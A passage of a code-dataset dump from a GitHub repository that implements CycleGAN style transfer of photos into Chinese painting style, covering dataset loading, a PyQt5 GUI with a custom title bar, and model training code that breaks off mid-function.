"db958539dfe7f5ba8ceb7cfb7249205e65ea6ea0", "content_id": "34a30d996e165bdc4a3f6d083fa32bacbbc78025", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2879, "license_type": "permissive", "max_line_length": 82, "num_lines": 82, "path": "/utils/__init__.py", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "\"\"\" Python package for image processing \"\"\"\nimport torch.utils.data\nfrom utils.dataset import Dataset\nfrom utils.params import opt\nfrom PIL import Image\n\n\ndef save_image(image_numpy, image_path, aspect_ratio=1.0):\n \"\"\"Save a numpy image to the disk\n\n Parameters:\n image_numpy (numpy array) -- input numpy array\n image_path (str) -- the path of the image\n \"\"\"\n\n image_pil = Image.fromarray(image_numpy)\n h, w, _ = image_numpy.shape\n\n if aspect_ratio > 1.0:\n image_pil = image_pil.resize((h, int(w * aspect_ratio)), Image.BICUBIC)\n if aspect_ratio < 1.0:\n image_pil = image_pil.resize((int(h / aspect_ratio), w), Image.BICUBIC)\n image_pil.save(image_path)\n\n\ndef create_dataset(train_or_test, max_dataset_size=float(\"inf\")):\n \"\"\"Create a dataset given the option.\n\n This function wraps the class CustomDatasetDataLoader.\n This is the main interface between this package and 'train.py'/'test.py'\n\n Example:\n >>> from utils import create_dataset\n >>> dataset = create_dataset(train_or_test, max_dataset_size)\n \"\"\"\n data_loader = DataLoader(train_or_test, max_dataset_size)\n data_set = data_loader.load_data()\n return data_set\n\n\ndef __print_size_warning(ow, oh, w, h):\n \"\"\"Print warning information about image size(only print once)\"\"\"\n if not hasattr(__print_size_warning, 'has_printed'):\n print(\"The image size needs to be a multiple of 4. \"\n \"The loaded image size was (%d, %d), so it was adjusted to \"\n \"(%d, %d). 
This adjustment will be done to all images \"\n \"whose sizes are not multiples of 4\" % (ow, oh, w, h))\n __print_size_warning.has_printed = True\n\n\nclass DataLoader:\n \"\"\"Wrapper class of Dataset class that performs multi-threaded data loading\"\"\"\n\n def __init__(self, train_or_test, max_dataset_size=float(\"inf\")):\n \"\"\"Initialize this class\n\n Step 1: create a dataset instance given the name [dataset_mode]\n Step 2: create a multi-threaded data loader.\n \"\"\"\n self.max_dataset_size = max_dataset_size\n self.dataset = Dataset(train_or_test)\n print(\"dataset [%s] was created\" % type(self.dataset).__name__)\n self.dataloader = torch.utils.data.DataLoader(\n self.dataset,\n batch_size=opt['batch_size'],\n # shuffle=not opt.serial_batches,\n shuffle=True,\n num_workers=int(opt['num_threads']))\n\n def load_data(self):\n return self\n\n def __len__(self):\n \"\"\"Return the number of data in the dataset\"\"\"\n return min(len(self.dataset), self.max_dataset_size)\n\n def __iter__(self):\n \"\"\"Return a batch of data\"\"\"\n for i, data in enumerate(self.dataloader):\n if i * opt['batch_size'] >= self.max_dataset_size:\n break\n yield data\n" }, { "alpha_fraction": 0.6307024955749512, "alphanum_fraction": 0.6699045896530151, "avg_line_length": 38.75862121582031, "blob_id": "851cc5ff65a585e7d4c404bb7698f453ce003164", "content_id": "89b077d9093b3c94b06220cb4c4f09cb7279bd6e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5941, "license_type": "permissive", "max_line_length": 104, "num_lines": 145, "path": "/gui/chinesepaintings.py", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'chinesepaintings.ui'\n#\n# Created by: PyQt5 UI code generator 5.9.2\n#\n# WARNING! 
All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import Qt\nfrom .notitle import TitleBar\n\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(958, 535)\n MainWindow.setStyleSheet(\"\")\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n\n MainWindow.setWindowFlags(Qt.FramelessWindowHint) # 隐藏边框\n # 标题栏\n self.titleBar = TitleBar(MainWindow)\n self.titleBar.setGeometry(QtCore.QRect(-1, -1, 960, 42))\n font = QtGui.QFont()\n font.setFamily(\"Consolas\")\n self.titleBar.setFont(font)\n self.titleBar.setStyleSheet(\"font:bold;background-image: url(:/pic/imgs/bg.png);color:#f9f1db;\")\n self.titleBar.windowMinimumed.connect(MainWindow.showMinimized)\n self.titleBar.windowClosed.connect(MainWindow.close)\n self.titleBar.windowMoved.connect(self.move)\n MainWindow.windowTitleChanged.connect(self.titleBar.setTitle)\n MainWindow.windowIconChanged.connect(self.titleBar.setIcon)\n\n self.background = QtWidgets.QLabel(self.centralwidget)\n self.background.setGeometry(QtCore.QRect(0, 0, 960, 540))\n self.background.setStyleSheet(\"background-image: url(:/pic/imgs/bg.png);\")\n self.background.setText(\"\")\n self.background.setObjectName(\"background\")\n self.org_image = QtWidgets.QLabel(self.centralwidget)\n self.org_image.setGeometry(QtCore.QRect(80, 110, 320, 320))\n self.org_image.setStyleSheet(\"border-width: 5px;\\n\"\n\"border-style: solid;\\n\"\n\"border-color: rgb(192, 72, 81);\")\n self.org_image.setText(\"\")\n self.org_image.setObjectName(\"org_image\")\n self.after_image = QtWidgets.QLabel(self.centralwidget)\n self.after_image.setGeometry(QtCore.QRect(560, 110, 320, 320))\n self.after_image.setStyleSheet(\"border-width: 5px;\\n\"\n\"border-style: solid;\\n\"\n\"border-color: rgb(192, 72, 81);\")\n self.after_image.setText(\"\")\n 
self.after_image.setObjectName(\"after_image\")\n self.transfer = QtWidgets.QPushButton(self.centralwidget)\n self.transfer.setGeometry(QtCore.QRect(430, 290, 101, 41))\n self.transfer.setStyleSheet(\"QPushButton{\\n\"\n\"font: 32pt \\\"方正字迹-周崇谦小篆繁体\\\";\\n\"\n\"color: rgb(192, 72, 81);\\n\"\n\"background-color:transparent;\\n\"\n\"}\\n\"\n\"QPushButton:hover{\\n\"\n\"color: #f9f1db;\\n\"\n\"}\")\n self.transfer.setObjectName(\"transfer\")\n self.OIMG = QtWidgets.QLabel(self.centralwidget)\n self.OIMG.setGeometry(QtCore.QRect(190, 70, 81, 41))\n self.OIMG.setStyleSheet(\"font: 32pt \\\"方正字迹-周崇谦小篆繁体\\\";\\n\"\n\"color: rgb(192, 72, 81);\")\n self.OIMG.setObjectName(\"OIMG\")\n self.AIMG = QtWidgets.QLabel(self.centralwidget)\n self.AIMG.setGeometry(QtCore.QRect(680, 70, 81, 41))\n self.AIMG.setStyleSheet(\"font: 32pt \\\"方正字迹-周崇谦小篆繁体\\\";\\n\"\n\"color: rgb(192, 72, 81);\")\n self.AIMG.setObjectName(\"AIMG\")\n self.open = QtWidgets.QPushButton(self.centralwidget)\n self.open.setGeometry(QtCore.QRect(430, 190, 101, 41))\n self.open.setStyleSheet(\"QPushButton{\\n\"\n\"font: 32pt \\\"方正字迹-周崇谦小篆繁体\\\";\\n\"\n\"color: rgb(192, 72, 81);\\n\"\n\"background-color:transparent;\\n\"\n\"}\\n\"\n\"QPushButton:hover{\\n\"\n\"color: #f9f1db;\\n\"\n\"}\")\n self.open.setObjectName(\"open\")\n self.progressBar = QtWidgets.QProgressBar(self.centralwidget)\n self.progressBar.setGeometry(QtCore.QRect(80, 460, 321, 31))\n self.progressBar.setStyleSheet(\"QProgressBar {\\n\"\n\" border: 2px solid grey;\\n\"\n\" border-radius: 5px;\\n\"\n\" border-color: #c04851;\\n\"\n\" text-align: center;\\n\"\n\" font: 75 12pt \\\"黑体-简\\\";\\n\"\n\" color: #b78d12;\\n\"\n\"}\\n\"\n\"\\n\"\n\"QProgressBar::chunk {\\n\"\n\" background-color: #c04851;\\n\"\n\" width: 20px;\\n\"\n\"}\")\n self.progressBar.setProperty(\"value\", 0)\n self.progressBar.setObjectName(\"progressBar\")\n self.pause = QtWidgets.QPushButton(self.centralwidget)\n self.pause.setGeometry(QtCore.QRect(560, 450, 101, 41))\n 
self.pause.setStyleSheet(\"QPushButton{\\n\"\n\"font: 32pt \\\"方正字迹-周崇谦小篆繁体\\\";\\n\"\n\"color: rgb(192, 72, 81);\\n\"\n\"background-color:transparent;\\n\"\n\"}\\n\"\n\"QPushButton:hover{\\n\"\n\"color: #f9f1db;\\n\"\n\"}\")\n self.pause.setObjectName(\"pause\")\n self.play = QtWidgets.QPushButton(self.centralwidget)\n self.play.setGeometry(QtCore.QRect(780, 450, 101, 41))\n self.play.setStyleSheet(\"QPushButton{\\n\"\n\"font: 32pt \\\"方正字迹-周崇谦小篆繁体\\\";\\n\"\n\"color: rgb(192, 72, 81);\\n\"\n\"background-color:transparent;\\n\"\n\"}\\n\"\n\"QPushButton:hover{\\n\"\n\"color: #f9f1db;\\n\"\n\"}\")\n self.play.setObjectName(\"play\")\n MainWindow.setCentralWidget(self.centralwidget)\n\n self.retranslateUi(MainWindow)\n self.open.clicked.connect(MainWindow.Open)\n self.transfer.clicked.connect(MainWindow.Transfer)\n self.pause.clicked.connect(MainWindow.Pause)\n self.play.clicked.connect(MainWindow.Play)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"\", \"\"))\n self.transfer.setText(_translate(\"MainWindow\", \"转化\"))\n self.OIMG.setText(_translate(\"MainWindow\", \"原图\"))\n self.AIMG.setText(_translate(\"MainWindow\", \"国画\"))\n self.open.setText(_translate(\"MainWindow\", \"打开\"))\n self.pause.setText(_translate(\"MainWindow\", \"暂停\"))\n self.play.setText(_translate(\"MainWindow\", \"播放\"))\n\nfrom . 
import source_rc\n" }, { "alpha_fraction": 0.688524603843689, "alphanum_fraction": 0.688524603843689, "avg_line_length": 25.14285659790039, "blob_id": "c7a21c8a18267c2bec21e0e9fa8c684a38958b07", "content_id": "b62d104582fc944c7220dabdacad5c2ab413d757", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 183, "license_type": "permissive", "max_line_length": 61, "num_lines": 7, "path": "/models/__init__.py", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "from . import cycle_gan\n\n\ndef create_model(isTrain):\n instance = cycle_gan.CycleGANModel(isTrain)\n print(\"model [%s] was created\" % type(instance).__name__)\n return instance\n" }, { "alpha_fraction": 0.6190913319587708, "alphanum_fraction": 0.6245984435081482, "avg_line_length": 28.255033493041992, "blob_id": "580f7ad5b4354b4dc914b8239473a5e8ac554f98", "content_id": "72d2c5932002ed70027c0e8a2bc868e3db3077bb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4684, "license_type": "permissive", "max_line_length": 96, "num_lines": 149, "path": "/gui/notitle.py", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author: jyroy\nimport sys\n\n\nfrom PyQt5.QtCore import Qt, pyqtSignal, QPoint\nfrom PyQt5.QtGui import QFont\nfrom PyQt5.QtWidgets import QHBoxLayout, QLabel, QSpacerItem, QSizePolicy\n\nfrom PyQt5.QtWidgets import QWidget, QPushButton\n\n# 样式\nStyleSheet = \"\"\"\n/*标题栏*/\nTitleBar {\n background-color: red;\n}\n/*最小化最大化关闭按钮通用默认背景*/\n#buttonMinimum,#buttonMaximum,#buttonClose {\n border: none;\n background-color: red;\n}\n/*悬停*/\n#buttonMinimum:hover,#buttonMaximum:hover {\n background-color: red;\n color: white;\n}\n#buttonClose:hover {\n color: white;\n}\n/*鼠标按下不放*/\n#buttonMinimum:pressed,#buttonMaximum:pressed {\n background-color: 
Firebrick;\n}\n#buttonClose:pressed {\n color: white;\n background-color: Firebrick;\n}\n\"\"\"\n\n\nclass TitleBar(QWidget):\n # 窗口最小化信号\n windowMinimumed = pyqtSignal()\n # # 窗口最大化信号\n # windowMaximumed = pyqtSignal()\n # # 窗口还原信号\n # windowNormaled = pyqtSignal()\n # 窗口关闭信号\n windowClosed = pyqtSignal()\n # 窗口移动\n windowMoved = pyqtSignal(QPoint)\n\n def __init__(self, *args, **kwargs):\n super(TitleBar, self).__init__(*args, **kwargs)\n # 支持qss设置背景\n self.setAttribute(Qt.WA_StyledBackground, True)\n self.mPos = None\n self.iconSize = 20 # 图标的默认大小\n # 布局\n layout = QHBoxLayout(self, spacing=0)\n layout.setContentsMargins(0, 0, 0, 0)\n # 窗口图标\n self.iconLabel = QLabel(self)\n # self.iconLabel.setScaledContents(True)\n layout.addWidget(self.iconLabel)\n # 窗口标题\n self.titleLabel = QLabel(self)\n self.titleLabel.setMargin(2)\n layout.addWidget(self.titleLabel)\n # 中间伸缩条\n layout.addSpacerItem(QSpacerItem(\n 40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum))\n # 利用Webdings字体来显示图标\n font = self.font() or QFont()\n font.setFamily('Webdings')\n # 最小化按钮\n self.buttonMinimum = QPushButton(\n '0', self, clicked=self.windowMinimumed.emit, font=font, objectName='buttonMinimum')\n layout.addWidget(self.buttonMinimum)\n # # 最大化/还原按钮\n # self.buttonMaximum = QPushButton(\n # '1', self, clicked=self.showMaximized, font=font, objectName='buttonMaximum')\n # layout.addWidget(self.buttonMaximum)\n # 关闭按钮\n self.buttonClose = QPushButton(\n 'r', self, clicked=self.windowClosed.emit, font=font, objectName='buttonClose')\n layout.addWidget(self.buttonClose)\n # 初始高度\n self.setHeight()\n\n # def showMaximized(self):\n # if self.buttonMaximum.text() == '1':\n # # 最大化\n # self.buttonMaximum.setText('2')\n # self.windowMaximumed.emit()\n # else: # 还原\n # self.buttonMaximum.setText('1')\n # self.windowNormaled.emit()\n\n def setHeight(self, height=38):\n \"\"\"设置标题栏高度\"\"\"\n self.setMinimumHeight(height)\n self.setMaximumHeight(height)\n # 设置右边按钮的大小\n 
self.buttonMinimum.setMinimumSize(height, height)\n self.buttonMinimum.setMaximumSize(height, height)\n # self.buttonMaximum.setMinimumSize(height, height)\n # self.buttonMaximum.setMaximumSize(height, height)\n self.buttonClose.setMinimumSize(height, height)\n self.buttonClose.setMaximumSize(height, height)\n\n def setTitle(self, title):\n \"\"\"设置标题\"\"\"\n\n self.titleLabel.setText(title)\n\n def setIcon(self, icon):\n \"\"\"设置图标\"\"\"\n self.iconLabel.setPixmap(icon.pixmap(self.iconSize, self.iconSize))\n\n def setIconSize(self, size):\n \"\"\"设置图标大小\"\"\"\n self.iconSize = size\n\n def enterEvent(self, event):\n self.setCursor(Qt.ArrowCursor)\n super(TitleBar, self).enterEvent(event)\n\n # def mouseDoubleClickEvent(self, event):\n # super(TitleBar, self).mouseDoubleClickEvent(event)\n # self.showMaximized()\n\n def mousePressEvent(self, event):\n \"\"\"鼠标点击事件\"\"\"\n if event.button() == Qt.LeftButton:\n self.mPos = event.pos()\n event.accept()\n\n def mouseReleaseEvent(self, event):\n '''鼠标弹起事件'''\n self.mPos = None\n event.accept()\n\n def mouseMoveEvent(self, event):\n if event.buttons() == Qt.LeftButton and self.mPos:\n self.windowMoved.emit(self.mapToGlobal(event.pos() - self.mPos))\n event.accept()" }, { "alpha_fraction": 0.6119521856307983, "alphanum_fraction": 0.6156706213951111, "avg_line_length": 37.030303955078125, "blob_id": "bbcc573bdeafe6cb6c8f5147cf811fe51037f15f", "content_id": "bc318bf61045b8f9878b0212351336482628dad4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3765, "license_type": "permissive", "max_line_length": 118, "num_lines": 99, "path": "/utils/dataset.py", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "import os\nfrom PIL import Image\nimport random\nimport torchvision.transforms as transforms\nfrom utils.params import opt\nIMG_EXTENSIONS = [\n '.jpg', '.JPG', '.jpeg', '.JPEG',\n '.png', '.PNG', '.ppm', '.PPM', '.bmp', 
'.BMP',\n '.tif', '.TIF', '.tiff', '.TIFF',\n]\n\n\ndef get_transform(method=Image.BICUBIC):\n transform_list = []\n # resize\n osize = [opt['load_size'], opt['load_size']]\n transform_list.append(transforms.Resize(osize, method))\n # crop\n transform_list.append(transforms.CenterCrop(opt['crop_size']))\n\n # flip\n # transform_list.append(transforms.RandomHorizontalFlip())\n\n # convert\n transform_list += [transforms.ToTensor()]\n transform_list += [transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]\n return transforms.Compose(transform_list)\n\n\ndef is_image_file(filename):\n return any(filename.endswith(extension) for extension in IMG_EXTENSIONS)\n\n\ndef make_dataset(_dir, max_dataset_size=float(\"inf\")):\n images = []\n assert os.path.isdir(_dir), '%s is not a valid directory' % _dir\n\n for root, _, fnames in sorted(os.walk(_dir)):\n for fname in fnames:\n if is_image_file(fname):\n path = os.path.join(root, fname)\n images.append(path)\n return images[:min(max_dataset_size, len(images))]\n\n\nclass Dataset:\n \"\"\"\n This dataset class can load unaligned/unpaired datasets.\n\n It requires two directories to host training images from domain A '/path/to/data/trainA'\n and from domain B '/path/to/data/trainB' respectively.\n You can train the model with the dataset flag '--dataroot /path/to/data'.\n Similarly, you need to prepare two directories:\n '/path/to/data/testA' and '/path/to/data/testB' during test time.\n \"\"\"\n\n def __init__(self, train_or_test, max_dataset_size=float(\"inf\")):\n self.dir_A = os.path.join('.\\\\data', train_or_test + 'A') # create a path '/path/to/data/trainA'\n self.dir_B = os.path.join('.\\\\data', train_or_test + 'B') # create a path '/path/to/data/trainB'\n\n self.A_paths = sorted(make_dataset(self.dir_A, max_dataset_size)) # load images from '/path/to/data/trainA'\n self.B_paths = sorted(make_dataset(self.dir_B, max_dataset_size)) # load images from '/path/to/data/trainB'\n self.A_size = len(self.A_paths) # get the 
size of dataset A\n self.B_size = len(self.B_paths) # get the size of dataset B\n self.transform_A = get_transform()\n self.transform_B = get_transform()\n\n def __getitem__(self, index):\n \"\"\"Return a data point and its metadata information.\n\n Parameters:\n index (int) -- a random integer for data indexing\n\n Returns a dictionary that contains A, B, A_paths and B_paths\n A (tensor) -- an image in the input domain\n B (tensor) -- its corresponding image in the target domain\n A_paths (str) -- image paths\n B_paths (str) -- image paths\n \"\"\"\n A_path = self.A_paths[index % self.A_size] # make sure index is within then range\n # randomize the index for domain B to avoid fixed pairs.\n index_B = random.randint(0, self.B_size - 1)\n\n B_path = self.B_paths[index_B]\n A_img = Image.open(A_path).convert('RGB')\n B_img = Image.open(B_path).convert('RGB')\n # apply image transformation\n A = self.transform_A(A_img)\n B = self.transform_B(B_img)\n\n return {'A': A, 'B': B, 'A_paths': A_path, 'B_paths': B_path}\n\n def __len__(self):\n \"\"\"Return the total number of images in the dataset.\n\n As we have two datasets with potentially different number of images,\n we take a maximum of\n \"\"\"\n return max(self.A_size, self.B_size)\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.7019230723381042, "avg_line_length": 16.5, "blob_id": "fbb70fc901b0dbefc4eaab188a7166a974ac0468", "content_id": "593fae820aef627e947fea21525ccf7f68035d4b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 104, "license_type": "permissive", "max_line_length": 23, "num_lines": 6, "path": "/requirements.txt", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "dominate~=2.6.0\ntorchvision~=0.9.1\npillow~=8.2.0\nnumpy~=1.19.2\nopencv-python~=4.5.2.54\nmatplotlib~=3.3.4" }, { "alpha_fraction": 0.5745269656181335, "alphanum_fraction": 0.5773587226867676, "avg_line_length": 47.25465774536133, 
"blob_id": "3a00dc470be59269f9dbcb1e8f5e19dedf482941", "content_id": "2726fd27b74dd9885f25ca06411cd3746b9f8fa9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15538, "license_type": "permissive", "max_line_length": 151, "num_lines": 322, "path": "/models/cycle_gan.py", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "import torch\nimport itertools\nfrom utils.image_pool import ImagePool\nfrom utils.params import opt\nfrom . import models\nfrom . import gan_loss\nimport os\nfrom collections import OrderedDict\n\n\nclass CycleGANModel:\n\n def __init__(self, isTrain):\n \"\"\"Initialize the CycleGAN class.\n\n Parameters:\n opt (Option class)-- stores all the experiment flags; needs to be a subclass of BaseOptions\n \"\"\"\n self.save_dir = os.path.join(opt['checkpoints_dir'], opt['name']) # save all the checkpoints to save_dir\n self.gpu_ids = opt['gpu_ids']\n self.isTrain = isTrain\n self.device = torch.device('cuda:{}'.format(self.gpu_ids[0])) if self.gpu_ids else torch.device(\n 'cpu') # get device name: CPU or GPU\n self.optimizers = []\n\n # specify the training losses you want to print out. The training/test scripts will call <BaseModel.get_current_losses>\n self.loss_names = ['D_A', 'G_A', 'cycle_A', 'idt_A', 'D_B', 'G_B', 'cycle_B', 'idt_B']\n # specify the images you want to save/display. The training/test scripts will call <BaseModel.get_current_visuals>\n visual_names_A = ['real_A', 'fake_B', 'rec_A']\n visual_names_B = ['real_B', 'fake_A', 'rec_B']\n if self.isTrain and opt['lambda_identity'] > 0.0: # if identity loss is used, we also visualize idt_B=G_A(B) ad idt_A=G_A(B)\n visual_names_A.append('idt_B')\n visual_names_B.append('idt_A')\n\n self.visual_names = visual_names_A + visual_names_B # combine visualizations for A and B\n # specify the models you want to save to the disk. 
The training/test scripts will call <BaseModel.save_networks> and <BaseModel.load_networks>.\n if self.isTrain:\n self.model_names = ['G_A', 'G_B', 'D_A', 'D_B']\n else: # during test time, only load Gs\n self.model_names = ['G_A', 'G_B']\n\n # define networks (both Generators and discriminators)\n # The naming is different from those used in the paper.\n # Code (vs. paper): G_A (G), G_B (F), D_A (D_Y), D_B (D_X)\n self.netG_A = models.define_G(opt['input_nc'], opt['output_nc'], opt['ngf'],\n not opt['no_dropout'], opt['init_gain'], self.gpu_ids)\n self.netG_B = models.define_G(opt['output_nc'], opt['input_nc'], opt['ngf'],\n not opt['no_dropout'], opt['init_gain'], self.gpu_ids)\n\n if self.isTrain: # define discriminators\n self.netD_A = models.define_D(opt['output_nc'], opt['ndf'],\n opt['n_layers_D'], opt['init_gain'], self.gpu_ids)\n self.netD_B = models.define_D(opt['input_nc'], opt['ndf'],\n opt['n_layers_D'], opt['init_gain'], self.gpu_ids)\n\n if self.isTrain:\n if opt['lambda_identity'] > 0.0: # only works when input and output images have the same number of channels\n assert (opt['input_nc'] == opt['output_nc'])\n self.fake_A_pool = ImagePool(opt['pool_size']) # create image buffer to store previously generated images\n self.fake_B_pool = ImagePool(opt['pool_size']) # create image buffer to store previously generated images\n # define loss functions\n self.criterionGAN = gan_loss.GANLoss().to(self.device) # define GAN loss.\n self.criterionCycle = torch.nn.L1Loss()\n self.criterionIdt = torch.nn.L1Loss()\n # initialize optimizers; schedulers will be automatically created by function <BaseModel.setup>.\n self.optimizer_G = torch.optim.Adam(itertools.chain(self.netG_A.parameters(), self.netG_B.parameters()),\n lr=opt['lr'], betas=(opt['beta1'], 0.999))\n self.optimizer_D = torch.optim.Adam(itertools.chain(self.netD_A.parameters(), self.netD_B.parameters()),\n lr=opt['lr'], betas=(opt['beta1'], 0.999))\n self.optimizers.append(self.optimizer_G)\n 
self.optimizers.append(self.optimizer_D)\n\n def set_input(self, _input):\n \"\"\"Unpack input data from the dataloader and perform necessary pre-processing steps.\n\n Parameters:\n _input (dict): include the data itself and its metadata information.\n\n The option 'direction' can be used to swap domain A and domain B.\n \"\"\"\n self.real_A = _input['A'].to(self.device)\n self.real_B = _input['B'].to(self.device)\n self.image_paths = _input['A_paths']\n\n def forward(self):\n \"\"\"Run forward pass; called by both functions <optimize_parameters> and <test>.\"\"\"\n self.fake_B = self.netG_A(self.real_A) # G_A(A)\n self.rec_A = self.netG_B(self.fake_B) # G_B(G_A(A))\n self.fake_A = self.netG_B(self.real_B) # G_B(B)\n self.rec_B = self.netG_A(self.fake_A) # G_A(G_B(B))\n\n def backward_D_basic(self, netD, real, fake):\n \"\"\"Calculate GAN loss for the discriminator\n\n Parameters:\n netD (network) -- the discriminator D\n real (tensor array) -- real images\n fake (tensor array) -- images generated by a generator\n\n Return the discriminator loss.\n We also call loss_D.backward() to calculate the gradients.\n \"\"\"\n # Real\n pred_real = netD(real)\n loss_D_real = self.criterionGAN(pred_real, True)\n # Fake\n pred_fake = netD(fake.detach())\n loss_D_fake = self.criterionGAN(pred_fake, False)\n # Combined loss and calculate gradients\n loss_D = (loss_D_real + loss_D_fake) * 0.5\n loss_D.backward()\n return loss_D\n\n def backward_D_A(self):\n \"\"\"Calculate GAN loss for discriminator D_A\"\"\"\n fake_B = self.fake_B_pool.query(self.fake_B)\n self.loss_D_A = self.backward_D_basic(self.netD_A, self.real_B, fake_B)\n\n def backward_D_B(self):\n \"\"\"Calculate GAN loss for discriminator D_B\"\"\"\n fake_A = self.fake_A_pool.query(self.fake_A)\n self.loss_D_B = self.backward_D_basic(self.netD_B, self.real_A, fake_A)\n\n def backward_G(self):\n \"\"\"Calculate the loss for generators G_A and G_B\"\"\"\n lambda_idt = opt['lambda_identity']\n lambda_A = opt['lambda_A']\n 
lambda_B = opt['lambda_B']\n # Identity loss\n if lambda_idt > 0:\n # G_A should be identity if real_B is fed: ||G_A(B) - B||\n self.idt_A = self.netG_A(self.real_B)\n self.loss_idt_A = self.criterionIdt(self.idt_A, self.real_B) * lambda_B * lambda_idt\n # G_B should be identity if real_A is fed: ||G_B(A) - A||\n self.idt_B = self.netG_B(self.real_A)\n self.loss_idt_B = self.criterionIdt(self.idt_B, self.real_A) * lambda_A * lambda_idt\n else:\n self.loss_idt_A = 0\n self.loss_idt_B = 0\n\n # GAN loss D_A(G_A(A))\n self.loss_G_A = self.criterionGAN(self.netD_A(self.fake_B), True)\n # GAN loss D_B(G_B(B))\n self.loss_G_B = self.criterionGAN(self.netD_B(self.fake_A), True)\n # Forward cycle loss || G_B(G_A(A)) - A||\n self.loss_cycle_A = self.criterionCycle(self.rec_A, self.real_A) * lambda_A\n # Backward cycle loss || G_A(G_B(B)) - B||\n self.loss_cycle_B = self.criterionCycle(self.rec_B, self.real_B) * lambda_B\n # combined loss and calculate gradients\n self.loss_G = self.loss_G_A + self.loss_G_B + self.loss_cycle_A + self.loss_cycle_B + self.loss_idt_A + self.loss_idt_B\n self.loss_G.backward()\n\n def optimize_parameters(self):\n \"\"\"Calculate losses, gradients, and update network weights; called in every training iteration\"\"\"\n # forward\n self.forward() # compute fake images and reconstruction images.\n # G_A and G_B\n self.set_requires_grad([self.netD_A, self.netD_B], False) # Ds require no gradients when optimizing Gs\n self.optimizer_G.zero_grad() # set G_A and G_B's gradients to zero\n self.backward_G() # calculate gradients for G_A and G_B\n self.optimizer_G.step() # update G_A and G_B's weights\n # D_A and D_B\n self.set_requires_grad([self.netD_A, self.netD_B], True)\n self.optimizer_D.zero_grad() # set D_A and D_B's gradients to zero\n self.backward_D_A() # calculate gradients for D_A\n self.backward_D_B() # calculate graidents for D_B\n self.optimizer_D.step() # update D_A and D_B's weights\n\n def optimize_D_parameters(self):\n \"\"\"Calculate 
losses, gradients, and update D network weights\"\"\"\n # forward\n self.forward() # compute fake images and reconstruction images.\n # D_A and D_B\n self.set_requires_grad([self.netD_A, self.netD_B], True)\n self.optimizer_D.zero_grad() # set D_A and D_B's gradients to zero\n self.backward_D_A() # calculate gradients for D_A\n self.backward_D_B() # calculate graidents for D_B\n self.optimizer_D.step() # update D_A and D_B's weights\n\n def set_requires_grad(self, nets, requires_grad=False):\n \"\"\"Set requies_grad=Fasle for all the networks to avoid unnecessary computations\n Parameters:\n nets (network list) -- a list of networks\n requires_grad (bool) -- whether the networks require gradients or not\n \"\"\"\n if not isinstance(nets, list):\n nets = [nets]\n for net in nets:\n if net is not None:\n for param in net.parameters():\n param.requires_grad = requires_grad\n\n def setup(self):\n \"\"\"Load and print networks; create schedulers\n\n Parameters:\n opt (Option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions\n \"\"\"\n if self.isTrain:\n self.schedulers = [models.get_scheduler(optimizer) for optimizer in self.optimizers]\n if not self.isTrain or opt['continue_train']:\n load_suffix = 'iter_%d' % opt['load_iter'] if opt['load_iter'] > 0 else opt['epoch']\n self.load_networks(load_suffix)\n self.print_networks(opt['verbose'])\n\n def load_networks(self, epoch):\n \"\"\"Load all the networks from the disk.\n\n Parameters:\n epoch (int) -- current epoch; used in the file name '%s_net_%s.pth' % (epoch, name)\n \"\"\"\n for name in self.model_names:\n if isinstance(name, str):\n load_filename = '%s_net_%s.pth' % (epoch, name)\n load_path = os.path.join(self.save_dir, load_filename)\n net = getattr(self, 'net' + name)\n if isinstance(net, torch.nn.DataParallel):\n net = net.module\n print('loading the model from %s' % load_path)\n # if you are using PyTorch newer than 0.4 (e.g., built from\n # GitHub source), you can remove str() 
on self.device\n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n\n # patch InstanceNorm checkpoints prior to 0.4\n for key in list(state_dict.keys()): # need to copy keys here because we mutate in loop\n self.__patch_instance_norm_state_dict(state_dict, net, key.split('.'))\n net.load_state_dict(state_dict)\n\n def __patch_instance_norm_state_dict(self, state_dict, module, keys, i=0):\n \"\"\"Fix InstanceNorm checkpoints incompatibility (prior to 0.4)\"\"\"\n key = keys[i]\n if i + 1 == len(keys): # at the end, pointing to a parameter/buffer\n if module.__class__.__name__.startswith('InstanceNorm') and \\\n (key == 'running_mean' or key == 'running_var'):\n if getattr(module, key) is None:\n state_dict.pop('.'.join(keys))\n if module.__class__.__name__.startswith('InstanceNorm') and \\\n (key == 'num_batches_tracked'):\n state_dict.pop('.'.join(keys))\n else:\n 